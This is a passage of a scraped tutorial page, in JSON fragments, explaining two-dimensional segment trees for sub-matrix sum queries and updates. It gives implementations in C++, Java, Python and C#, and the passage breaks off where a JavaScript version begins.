Paper III\n" }, { "code": null, "e": 22102, "s": 22075, "text": "\nUGC NET CS Solved Papers\n" }, { "code": null, "e": 
22359, "s": 22102, "text": "\nStudent\n \n\n\nCampus Ambassador Program\n\nSchool Ambassador Program\n\nProject\n\nGeek of the Month\n\nCampus Geek of the Month\n\nPlacement Course\n\nCompetititve Programming\n\nTestimonials\n\nStudent Chapter\n\nGeek on the Top\n\nInternship\n\nCareers\n" }, { "code": null, "e": 22387, "s": 22359, "text": "\nCampus Ambassador Program\n" }, { "code": null, "e": 22415, "s": 22387, "text": "\nSchool Ambassador Program\n" }, { "code": null, "e": 22425, "s": 22415, "text": "\nProject\n" }, { "code": null, "e": 22445, "s": 22425, "text": "\nGeek of the Month\n" }, { "code": null, "e": 22472, "s": 22445, "text": "\nCampus Geek of the Month\n" }, { "code": null, "e": 22491, "s": 22472, "text": "\nPlacement Course\n" }, { "code": null, "e": 22518, "s": 22491, "text": "\nCompetititve Programming\n" }, { "code": null, "e": 22533, "s": 22518, "text": "\nTestimonials\n" }, { "code": null, "e": 22551, "s": 22533, "text": "\nStudent Chapter\n" }, { "code": null, "e": 22569, "s": 22551, "text": "\nGeek on the Top\n" }, { "code": null, "e": 22582, "s": 22569, "text": "\nInternship\n" }, { "code": null, "e": 22592, "s": 22582, "text": "\nCareers\n" }, { "code": null, "e": 22769, "s": 22592, "text": "\nCurated DSA Lists\n \n\n\nLove Babbar Sheet\n\nTop 50 Array Problems\n\nTop 50 String Problems\n\nTop 50 Tree Problems\n\nTop 50 Graph Problems\n\nTop 50 DP Problems\n" }, { "code": null, "e": 22789, "s": 22769, "text": "\nLove Babbar Sheet\n" }, { "code": null, "e": 22813, "s": 22789, "text": "\nTop 50 Array Problems\n" }, { "code": null, "e": 22838, "s": 22813, "text": "\nTop 50 String Problems\n" }, { "code": null, "e": 22861, "s": 22838, "text": "\nTop 50 Tree Problems\n" }, { "code": null, "e": 22885, "s": 22861, "text": "\nTop 50 Graph Problems\n" }, { "code": null, "e": 22906, "s": 22885, "text": "\nTop 50 DP Problems\n" }, { "code": null, "e": 22944, "s": 22906, "text": "\nTutorials\n \n\n" }, { "code": null, "e": 23017, "s": 22944, "text": "\nJobs\n \n\n\nApply for Jobs\n\nPost a Job\n\nJOB-A-THON\n" }, { "code": null, "e": 23034, "s": 23017, "text": "\nApply for Jobs\n" }, { "code": null, "e": 23047, "s": 23034, "text": "\nPost a Job\n" }, { "code": null, "e": 23060, "s": 23047, "text": "\nJOB-A-THON\n" }, { "code": null, "e": 23246, "s": 23060, "text": "\nPractice\n \n\n\nAll DSA Problems\n\nProblem of the Day\n\nInterview Series: Weekly Contests\n\nBi-Wizard Coding: School Contests\n\nContests and Events\n\nPractice SDE Sheet\n" }, { "code": null, "e": 23265, "s": 23246, "text": "\nAll DSA Problems\n" }, { "code": null, "e": 23286, "s": 23265, "text": "\nProblem of the Day\n" }, { "code": null, "e": 23322, "s": 23286, "text": "\nInterview Series: Weekly Contests\n" }, { "code": null, "e": 23358, "s": 23322, "text": "\nBi-Wizard Coding: School Contests\n" }, { "code": null, "e": 23380, "s": 23358, "text": "\nContests and Events\n" }, { "code": null, "e": 23401, "s": 23380, "text": "\nPractice SDE Sheet\n" }, { "code": null, "e": 23407, "s": 23401, "text": "GBlog" }, { "code": null, "e": 23415, "s": 23407, "text": "Puzzles" }, { "code": null, "e": 23428, "s": 23415, "text": "What's New ?" 
}, { "code": null, "e": 23434, "s": 23428, "text": "Array" }, { "code": null, "e": 23441, "s": 23434, "text": "Matrix" }, { "code": null, "e": 23449, "s": 23441, "text": "Strings" }, { "code": null, "e": 23457, "s": 23449, "text": "Hashing" }, { "code": null, "e": 23469, "s": 23457, "text": "Linked List" }, { "code": null, "e": 23475, "s": 23469, "text": "Stack" }, { "code": null, "e": 23481, "s": 23475, "text": "Queue" }, { "code": null, "e": 23493, "s": 23481, "text": "Binary Tree" }, { "code": null, "e": 23512, "s": 23493, "text": "Binary Search Tree" }, { "code": null, "e": 23517, "s": 23512, "text": "Heap" }, { "code": null, "e": 23523, "s": 23517, "text": "Graph" }, { "code": null, "e": 23533, "s": 23523, "text": "Searching" }, { "code": null, "e": 23541, "s": 23533, "text": "Sorting" }, { "code": null, "e": 23558, "s": 23541, "text": "Divide & Conquer" }, { "code": null, "e": 23571, "s": 23558, "text": "Mathematical" }, { "code": null, "e": 23581, "s": 23571, "text": "Geometric" }, { "code": null, "e": 23589, "s": 23581, "text": "Bitwise" }, { "code": null, "e": 23596, "s": 23589, "text": "Greedy" }, { "code": null, "e": 23609, "s": 23596, "text": "Backtracking" }, { "code": null, "e": 23626, "s": 23609, "text": "Branch and Bound" }, { "code": null, "e": 23646, "s": 23626, "text": "Dynamic Programming" }, { "code": null, "e": 23664, "s": 23646, "text": "Pattern Searching" }, { "code": null, "e": 23675, "s": 23664, "text": "Randomized" }, { "code": null, "e": 23704, "s": 23675, "text": "AVL Tree | Set 1 (Insertion)" }, { "code": null, "e": 23731, "s": 23704, "text": "Trie | (Insert and Search)" }, { "code": null, "e": 23756, "s": 23731, "text": "LRU Cache Implementation" }, { "code": null, "e": 23794, "s": 23756, "text": "Red-Black Tree | Set 1 (Introduction)" }, { "code": null, "e": 23817, "s": 23794, "text": "Introduction of B-Tree" }, { "code": null, "e": 23859, "s": 23817, "text": "Segment Tree | Set 1 (Sum of given range)" }, { "code": null, "e": 23893, "s": 23859, "text": "Agents in Artificial Intelligence" }, { "code": null, "e": 23921, "s": 23893, "text": "AVL Tree | Set 2 (Deletion)" }, { "code": null, "e": 23961, "s": 23921, "text": "Decision Tree Introduction with example" }, { "code": null, "e": 23993, "s": 23961, "text": "Red-Black Tree | Set 2 (Insert)" }, { "code": null, "e": 24029, "s": 23993, "text": "Binary Indexed Tree or Fenwick Tree" }, { "code": null, "e": 24058, "s": 24029, "text": "Disjoint Set Data Structures" }, { "code": null, "e": 24085, "s": 24058, "text": "Insert Operation in B-Tree" }, { "code": null, "e": 24105, "s": 24085, "text": "Design a Chess Game" }, { "code": null, "e": 24119, "s": 24105, "text": "Binomial Heap" }, { "code": null, "e": 24211, "s": 24119, "text": "Design a data structure that supports insert, delete, search and getRandom in constant time" }, { "code": null, "e": 24275, "s": 24211, "text": "XOR Linked List - A Memory Efficient Doubly Linked List | Set 1" }, { "code": null, "e": 24318, "s": 24275, "text": "How to design a tiny URL or URL shortener?" 
}, { "code": null, "e": 24343, "s": 24318, "text": "Generic Linked List in C" }, { "code": null, "e": 24381, "s": 24343, "text": "Difference between B tree and B+ tree" }, { "code": null, "e": 24413, "s": 24381, "text": "Red-Black Tree | Set 3 (Delete)" }, { "code": null, "e": 24446, "s": 24413, "text": "Skip List | Set 1 (Introduction)" }, { "code": null, "e": 24494, "s": 24446, "text": "Largest Rectangular Area in a Histogram | Set 1" }, { "code": null, "e": 24522, "s": 24494, "text": "Splay Tree | Set 1 (Search)" }, { "code": null, "e": 24560, "s": 24522, "text": "Fibonacci Heap | Set 1 (Introduction)" }, { "code": null, "e": 24596, "s": 24560, "text": "Pattern Searching using Suffix Tree" }, { "code": null, "e": 24623, "s": 24596, "text": "Delete Operation in B-Tree" }, { "code": null, "e": 24670, "s": 24623, "text": "K Dimensional Tree | Set 1 (Search and Insert)" }, { "code": null, "e": 24703, "s": 24670, "text": "Auto-complete feature using Trie" }, { "code": null, "e": 24732, "s": 24703, "text": "Some Basic Theorems on Trees" }, { "code": null, "e": 24761, "s": 24732, "text": "AVL Tree | Set 1 (Insertion)" }, { "code": null, "e": 24788, "s": 24761, "text": "Trie | (Insert and Search)" }, { "code": null, "e": 24813, "s": 24788, "text": "LRU Cache Implementation" }, { "code": null, "e": 24851, "s": 24813, "text": "Red-Black Tree | Set 1 (Introduction)" }, { "code": null, "e": 24874, "s": 24851, "text": "Introduction of B-Tree" }, { "code": null, "e": 24916, "s": 24874, "text": "Segment Tree | Set 1 (Sum of given range)" }, { "code": null, "e": 24950, "s": 24916, "text": "Agents in Artificial Intelligence" }, { "code": null, "e": 24978, "s": 24950, "text": "AVL Tree | Set 2 (Deletion)" }, { "code": null, "e": 25018, "s": 24978, "text": "Decision Tree Introduction with example" }, { "code": null, "e": 25050, "s": 25018, "text": "Red-Black Tree | Set 2 (Insert)" }, { "code": null, "e": 25086, "s": 25050, "text": "Binary Indexed Tree or Fenwick Tree" }, { "code": null, "e": 25115, "s": 25086, "text": "Disjoint Set Data Structures" }, { "code": null, "e": 25142, "s": 25115, "text": "Insert Operation in B-Tree" }, { "code": null, "e": 25162, "s": 25142, "text": "Design a Chess Game" }, { "code": null, "e": 25176, "s": 25162, "text": "Binomial Heap" }, { "code": null, "e": 25268, "s": 25176, "text": "Design a data structure that supports insert, delete, search and getRandom in constant time" }, { "code": null, "e": 25332, "s": 25268, "text": "XOR Linked List - A Memory Efficient Doubly Linked List | Set 1" }, { "code": null, "e": 25375, "s": 25332, "text": "How to design a tiny URL or URL shortener?" 
}, { "code": null, "e": 25400, "s": 25375, "text": "Generic Linked List in C" }, { "code": null, "e": 25438, "s": 25400, "text": "Difference between B tree and B+ tree" }, { "code": null, "e": 25470, "s": 25438, "text": "Red-Black Tree | Set 3 (Delete)" }, { "code": null, "e": 25503, "s": 25470, "text": "Skip List | Set 1 (Introduction)" }, { "code": null, "e": 25551, "s": 25503, "text": "Largest Rectangular Area in a Histogram | Set 1" }, { "code": null, "e": 25579, "s": 25551, "text": "Splay Tree | Set 1 (Search)" }, { "code": null, "e": 25617, "s": 25579, "text": "Fibonacci Heap | Set 1 (Introduction)" }, { "code": null, "e": 25653, "s": 25617, "text": "Pattern Searching using Suffix Tree" }, { "code": null, "e": 25680, "s": 25653, "text": "Delete Operation in B-Tree" }, { "code": null, "e": 25727, "s": 25680, "text": "K Dimensional Tree | Set 1 (Search and Insert)" }, { "code": null, "e": 25760, "s": 25727, "text": "Auto-complete feature using Trie" }, { "code": null, "e": 25789, "s": 25760, "text": "Some Basic Theorems on Trees" }, { "code": null, "e": 25813, "s": 25789, "text": "Difficulty Level :\nHard" }, { "code": null, "e": 26046, "s": 25813, "text": "Given a rectangular matrix M[0...n-1][0...m-1], and queries are asked to find the sum / minimum / maximum on some sub-rectangles M[a...b][e...f], as well as queries for modification of individual matrix elements (i.e M[x] [y] = p )." }, { "code": null, "e": 26297, "s": 26046, "text": "We can also answer sub-matrix queries using Two Dimensional Binary Indexed Tree.In this article, We will focus on solving sub-matrix queries using two dimensional segment tree.Two dimensional segment tree is nothing but segment tree of segment trees." }, { "code": null, "e": 26347, "s": 26297, "text": "Prerequisite : Segment Tree – Sum of given range " }, { "code": null, "e": 26896, "s": 26347, "text": "Algorithm : We will build a two-dimensional tree of segments by the following principle: 1 . In First step, We will construct an ordinary one-dimensional segment tree, working only with the first coordinate say ‘x’ and ‘y’ as constant. Here, we will not write number in inside the node as in the one-dimensional segment tree, but an entire tree of segments. 2. The second step is to combine the values of segmented trees. Assume that in second step instead of combining the elements we are combining the segment trees obtained from the step first. " }, { "code": null, "e": 27004, "s": 26896, "text": "Consider the below example. Suppose we have to find the sum of all numbers inside the highlighted red area " }, { "code": null, "e": 27195, "s": 27004, "text": "Step 1 : We will first create the segment tree of each strip of y- axis.We represent the segment tree here as an array where child node is 2n and 2n+1 where n > 0.Segment Tree for strip y=1 " }, { "code": null, "e": 27226, "s": 27195, "text": "Segment Tree for Strip y = 2 " }, { "code": null, "e": 27257, "s": 27226, "text": "Segment Tree for Strip y = 3 " }, { "code": null, "e": 27288, "s": 27257, "text": "Segment Tree for Strip y = 4 " }, { "code": null, "e": 27463, "s": 27288, "text": "Step 2: In this step, we create the segment tree for the rectangular matrix where the base node are the strips of y-axis given above.The task is to merge above segment trees." }, { "code": null, "e": 27476, "s": 27463, "text": "Sum Query : " }, { "code": null, "e": 27529, "s": 27476, "text": "Thanks to Sahil Bansal for contributing this image. 
" }, { "code": null, "e": 28061, "s": 27529, "text": "Processing Query : We will respond to the two-dimensional query by the following principle: first to break the query on the first coordinate, and then, when we reached some vertex of the tree of segments with the first coordinate and then we call the corresponding tree of segments on the second coordinate.This function works in time O(logn*log m), because it first descends the tree in the first coordinate, and for each traversed vertex of that tree, it makes a query from the usual tree of segments along the second coordinate." }, { "code": null, "e": 28644, "s": 28061, "text": "Modification Query :We want to learn how to modify the tree of segments in accordance with the change in the value of an element M[x] [y] = p .It is clear that the changes will occur only in those vertices of the first tree of segments that cover the coordinate x, and for the trees of the segments corresponding to them, the changes will only occur in those vertices that cover the coordinate y. Therefore, the implementation of the modification request will not be very different from the one-dimensional case, only now we first descend the first coordinate, and then the second. " }, { "code": null, "e": 28688, "s": 28644, "text": "Output for the highlighted area will be 25." }, { "code": null, "e": 28736, "s": 28688, "text": "Below is the implementation of above approach :" }, { "code": null, "e": 28740, "s": 28736, "text": "C++" }, { "code": null, "e": 28745, "s": 28740, "text": "Java" }, { "code": null, "e": 28753, "s": 28745, "text": "Python3" }, { "code": null, "e": 28756, "s": 28753, "text": "C#" }, { "code": null, "e": 28767, "s": 28756, "text": "Javascript" }, { "code": "// C++ program for implementation// of 2D segment tree.#include <bits/stdc++.h>using namespace std; // Base node of segment tree.int ini_seg[1000][1000] = { 0 }; // final 2d-segment tree.int fin_seg[1000][1000] = { 0 }; // Rectangular matrix.int rect[4][4] = { { 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 1, 7, 5, 9 }, { 3, 0, 6, 2 },}; // size of x coordinate.int size = 4; /* * A recursive function that constructs * Initial Segment Tree for array rect[][] = { }. * 'pos' is index of current node in segment * tree seg[]. 'strip' is the enumeration * for the y-axis.*/ int segment(int low, int high, int pos, int strip){ if (high == low) { ini_seg[strip][pos] = rect[strip][low]; } else { int mid = (low + high) / 2; segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip][pos] = ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]; }} /* * A recursive function that constructs * Final Segment Tree for array ini_seg[][] = { }.*/int finalSegment(int low, int high, int pos){ if (high == low) { for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = ini_seg[low][i]; } else { int mid = (low + high) / 2; finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} /** Return sum of elements in range from index* x1 to x2 . 
It uses the final_seg[][] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[][].*/int finalQuery(int pos, int start, int end, int x1, int x2, int node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node][pos]; } int mid = (start + end) / 2; int p1 = finalQuery(2 * pos, start, mid, x1, x2, node); int p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/int query(int pos, int start, int end, int y1, int y2, int x1, int x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } int mid = (start + end) / 2; int p1 = query(2 * pos, start, mid, y1, y2, x1, x2); int p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodes which for the given index. The following are parameters : pos --> index of current node in segment tree fin_seg[][]. x -> index of the element to be updated. val --> Value to be change at node idx*/int finalUpdate(int pos, int low, int high, int x, int val, int node){ if (low == high) { fin_seg[node][pos] = val; } else { int mid = (low + high) / 2; if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node][pos] = fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]; }} /* This function call the final update function after visiting the yth coordinate in the segment tree fin_seg[][].*/int update(int pos, int low, int high, int x, int y, int val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { int mid = (low + high) / 2; if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (int i = 1; i < size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} // Driver program to test above functionsint main(){ int pos = 1; int low = 0; int high = 3; // Call the ini_segment() to create the // initial segment tree on x- coordinate for (int strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to built the 2d segment tree. finalSegment(low, high, 1); /* Query: * To request the query for sub-rectangle y1, y2=(2, 3) x1, x2=(2, 3) * update the value of index (3, 3)=100; * To request the query for sub-rectangle y1, y2=(2, 3) x1, x2=(2, 3)*/ cout << \"The sum of the submatrix (y1, y2)->(2, 3), \" << \" (x1, x2)->(2, 3) is \" << query(1, 1, 4, 2, 3, 2, 3) << endl; // Function to update the value update(1, 1, 4, 2, 3, 100); cout << \"The sum of the submatrix (y1, y2)->(2, 3), \" << \"(x1, x2)->(2, 3) is \" << query(1, 1, 4, 2, 3, 2, 3) << endl; return 0;}", "e": 33807, "s": 28767, "text": null }, { "code": "// Java program for implementation// of 2D segment tree.import java.util.*; class GfG{ // Base node of segment tree.static int ini_seg[][] = new int[1000][1000]; // final 2d-segment tree.static int fin_seg[][] = new int[1000][1000]; // Rectangular matrix.static int rect[][] = {{ 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 1, 7, 5, 9 }, { 3, 0, 6, 2 }, }; // size of x coordinate.static int size = 4; /** A recursive function that constructs* Initial Segment Tree for array rect[][] = { }.* 'pos' is index of current node in segment* tree seg[]. 
'strip' is the enumeration* for the y-axis.*/ static void segment(int low, int high, int pos, int strip){ if (high == low) { ini_seg[strip][pos] = rect[strip][low]; } else { int mid = (low + high) / 2; segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip][pos] = ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]; }} /** A recursive function that constructs* Final Segment Tree for array ini_seg[][] = { }.*/static void finalSegment(int low, int high, int pos){ if (high == low) { for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = ini_seg[low][i]; } else { int mid = (low + high) / 2; finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (int i = 1; i < 2 * size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} /** Return sum of elements in range from index* x1 to x2 . It uses the final_seg[][] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[][].*/static int finalQuery(int pos, int start, int end, int x1, int x2, int node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node][pos]; } int mid = (start + end) / 2; int p1 = finalQuery(2 * pos, start, mid, x1, x2, node); int p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/static int query(int pos, int start, int end, int y1, int y2, int x1, int x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } int mid = (start + end) / 2; int p1 = query(2 * pos, start, mid, y1, y2, x1, x2); int p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[][]. x ->index of the element to be updated. val -->Value to be change at node idx*/static void finalUpdate(int pos, int low, int high, int x, int val, int node){ if (low == high) { fin_seg[node][pos] = val; } else { int mid = (low + high) / 2; if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node][pos] = fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]; }} /*This function call the finalupdate function after visitingthe yth coordinate in the segmenttree fin_seg[][].*/static void update(int pos, int low, int high, int x, int y, int val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { int mid = (low + high) / 2; if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (int i = 1; i < size; i++) fin_seg[pos][i] = fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]; }} // Driver codepublic static void main(String[] args){ int pos = 1; int low = 0; int high = 3; // Call the ini_segment() to create the // initial segment tree on x- coordinate for (int strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to // built the 2d segment tree. 
finalSegment(low, high, 1); /*Query:* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)* update the value of index (3, 3)=100;* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)*/ System.out.println(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \" (x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)); // Function to update the value update(1, 1, 4, 2, 3, 100); System.out.println(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \"(x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)); }} // This code has been contributed by 29AjayKumar", "e": 39096, "s": 33807, "text": null }, { "code": "# Python 3 program for implementation# of 2D segment tree. # Base node of segment tree.ini_seg = [[ 0 for x in range(1000)] for y in range(1000)] # final 2d-segment tree.fin_seg = [[ 0 for x in range(1000)] for y in range(1000)] # Rectangular matrix.rect= [[ 1, 2, 3, 4 ], [ 5, 6, 7, 8 ], [ 1, 7, 5, 9 ], [ 3, 0, 6, 2 ]] # size of x coordinate.size = 4 '''* A recursive function that constructs* Initial Segment Tree for array rect[][] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.''' def segment(low, high, pos, strip): if (high == low) : ini_seg[strip][pos] = rect[strip][low] else : mid = (low + high) // 2 segment(low, mid, 2 * pos, strip) segment(mid + 1, high, 2 * pos + 1, strip) ini_seg[strip][pos] = (ini_seg[strip][2 * pos] + ini_seg[strip][2 * pos + 1]) # A recursive function that constructs# Final Segment Tree for array ini_seg[][] = { }.def finalSegment(low, high, pos): if (high == low) : for i in range(1, 2 * size): fin_seg[pos][i] = ini_seg[low][i] else : mid = (low + high) // 2 finalSegment(low, mid, 2 * pos) finalSegment(mid + 1, high, 2 * pos + 1) for i in range( 1, 2 * size): fin_seg[pos][i] = (fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]) '''* Return sum of elements in range* from index x1 to x2 . It uses the* final_seg[][] array created using* finalsegment() function. 'pos' is* index of current node in segment* tree fin_seg[][].'''def finalQuery(pos, start, end, x1, x2, node): if (x2 < start or end < x1) : return 0 if (x1 <= start and end <= x2) : return fin_seg[node][pos] mid = (start + end) // 2 p1 = finalQuery(2 * pos, start, mid, x1, x2, node) p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node) return (p1 + p2) '''* This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.'''def query(pos, start, end, y1, y2, x1, x2): if (y2 < start or end < y1) : return 0 if (y1 <= start and end <= y2) : return (finalQuery(1, 1, 4, x1, x2, pos)) mid = (start + end) // 2 p1 = query(2 * pos, start, mid, y1, y2, x1, x2) p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2) return (p1 + p2) ''' A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[][]. x ->index of the element to be updated. 
val -->Value to be change at node idx'''def finalUpdate(pos, low, high, x, val, node): if (low == high) : fin_seg[node][pos] = val else : mid = (low + high) // 2 if (low <= x and x <= mid) : finalUpdate(2 * pos, low, mid, x, val, node) else : finalUpdate(2 * pos + 1, mid + 1, high, x, val, node) fin_seg[node][pos] = (fin_seg[node][2 * pos] + fin_seg[node][2 * pos + 1]) # This function call the final# update function after visiting# the yth coordinate in the# segment tree fin_seg[][].def update(pos, low, high, x, y, val): if (low == high) : finalUpdate(1, 1, 4, x, val, pos) else : mid = (low + high) // 2 if (low <= y and y <= mid) : update(2 * pos, low, mid, x, y, val) else : update(2 * pos + 1, mid + 1, high, x, y, val) for i in range(1, size): fin_seg[pos][i] = (fin_seg[2 * pos][i] + fin_seg[2 * pos + 1][i]) # Driver Codeif __name__ == \"__main__\": pos = 1 low = 0 high = 3 # Call the ini_segment() to create the # initial segment tree on x- coordinate for strip in range(4): segment(low, high, 1, strip) # Call the final function to built # the 2d segment tree. finalSegment(low, high, 1)''' Query: * To request the query for sub-rectangle * y1, y2=(2, 3) x1, x2=(2, 3) * update the value of index (3, 3)=100; * To request the query for sub-rectangle * y1, y2=(2, 3) x1, x2=(2, 3) '''print( \"The sum of the submatrix (y1, y2)->(2, 3), \", \"(x1, x2)->(2, 3) is \", query(1, 1, 4, 2, 3, 2, 3)) # Function to update the valueupdate(1, 1, 4, 2, 3, 100) print( \"The sum of the submatrix (y1, y2)->(2, 3), \", \"(x1, x2)->(2, 3) is \", query(1, 1, 4, 2, 3, 2, 3))", "e": 43781, "s": 39096, "text": null }, { "code": "// C# program for implementation// of 2D segment tree.using System; class GfG{ // Base node of segment tree.static int [,]ini_seg = new int[1000, 1000]; // final 2d-segment tree.static int [,]fin_seg = new int[1000, 1000]; // Rectangular matrix.static int [,]rect = {{ 1, 2, 3, 4 }, { 5, 6, 7, 8 }, { 1, 7, 5, 9 }, { 3, 0, 6, 2 }, }; // size of x coordinate.static int size = 4; /** A recursive function that constructs* Initial Segment Tree for array rect[,] = { }.* 'pos' is index of current node in segment* tree seg[]. 'strip' is the enumeration* for the y-axis.*/ static void segment(int low, int high, int pos, int strip){ if (high == low) { ini_seg[strip, pos] = rect[strip, low]; } else { int mid = (low + high) / 2; segment(low, mid, 2 * pos, strip); segment(mid + 1, high, 2 * pos + 1, strip); ini_seg[strip,pos] = ini_seg[strip, 2 * pos] + ini_seg[strip, 2 * pos + 1]; }} /** A recursive function that constructs* Final Segment Tree for array ini_seg[,] = { }.*/static void finalSegment(int low, int high, int pos){ if (high == low) { for (int i = 1; i < 2 * size; i++) fin_seg[pos, i] = ini_seg[low, i]; } else { int mid = (low + high) / 2; finalSegment(low, mid, 2 * pos); finalSegment(mid + 1, high, 2 * pos + 1); for (int i = 1; i < 2 * size; i++) fin_seg[pos,i] = fin_seg[2 * pos, i] + fin_seg[2 * pos + 1, i]; }} /** Return sum of elements in range from index* x1 to x2 . 
It uses the final_seg[,] array* created using finalsegment() function.* 'pos' is index of current node in* segment tree fin_seg[,].*/static int finalQuery(int pos, int start, int end, int x1, int x2, int node){ if (x2 < start || end < x1) { return 0; } if (x1 <= start && end <= x2) { return fin_seg[node, pos]; } int mid = (start + end) / 2; int p1 = finalQuery(2 * pos, start, mid, x1, x2, node); int p2 = finalQuery(2 * pos + 1, mid + 1, end, x1, x2, node); return (p1 + p2);} /** This function calls the finalQuery function* for elements in range from index x1 to x2 .* This function queries the yth coordinate.*/static int query(int pos, int start, int end, int y1, int y2, int x1, int x2){ if (y2 < start || end < y1) { return 0; } if (y1 <= start && end <= y2) { return (finalQuery(1, 1, 4, x1, x2, pos)); } int mid = (start + end) / 2; int p1 = query(2 * pos, start, mid, y1, y2, x1, x2); int p2 = query(2 * pos + 1, mid + 1, end, y1, y2, x1, x2); return (p1 + p2);} /* A recursive function to update the nodeswhich for the given index. The followingare parameters : pos --> index of currentnode in segment tree fin_seg[,]. x ->index of the element to be updated. val -->Value to be change at node idx*/static void finalUpdate(int pos, int low, int high, int x, int val, int node){ if (low == high) { fin_seg[node, pos] = val; } else { int mid = (low + high) / 2; if (low <= x && x <= mid) { finalUpdate(2 * pos, low, mid, x, val, node); } else { finalUpdate(2 * pos + 1, mid + 1, high, x, val, node); } fin_seg[node,pos] = fin_seg[node, 2 * pos] + fin_seg[node, 2 * pos + 1]; }} /*This function call the finalupdate function after visitingthe yth coordinate in the segmenttree fin_seg[,].*/static void update(int pos, int low, int high, int x, int y, int val){ if (low == high) { finalUpdate(1, 1, 4, x, val, pos); } else { int mid = (low + high) / 2; if (low <= y && y <= mid) { update(2 * pos, low, mid, x, y, val); } else { update(2 * pos + 1, mid + 1, high, x, y, val); } for (int i = 1; i < size; i++) fin_seg[pos,i] = fin_seg[2 * pos, i] + fin_seg[2 * pos + 1, i]; }} // Driver codepublic static void Main(){ int pos = 1; int low = 0; int high = 3; // Call the ini_segment() to create the // initial segment tree on x- coordinate for (int strip = 0; strip < 4; strip++) segment(low, high, 1, strip); // Call the final function to // built the 2d segment tree. finalSegment(low, high, 1); /*Query:* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)* update the value of index (3, 3)=100;* To request the query for sub-rectangley1, y2=(2, 3) x1, x2=(2, 3)*/ Console.WriteLine(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \" (x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)); // Function to update the value update(1, 1, 4, 2, 3, 100); Console.WriteLine(\"The sum of the submatrix (y1, y2)->(2, 3), \" + \"(x1, x2)->(2, 3) is \" + query(1, 1, 4, 2, 3, 2, 3)); }} /* This code contributed by PrinciRaj1992 */", "e": 49030, "s": 43781, "text": null }, { "code": "<script>// Javascript program for implementation// of 2D segment tree. // Base node of segment tree. let ini_seg = new Array(1000); // final 2d-segment tree. let fin_seg = new Array(1000); for(let i = 0; i < 1000; i++) { ini_seg[i] = new Array(1000); fin_seg[i] = new Array(1000); for(let j = 0; j < 1000; j++) { ini_seg[i][j] = 0; fin_seg[i][j] = 0; } } // Rectangular matrix. let rect = [[ 1, 2, 3, 4 ], [ 5, 6, 7, 8 ], [ 1, 7, 5, 9 ], [ 3, 0, 6, 2 ]]; // size of x coordinate. 
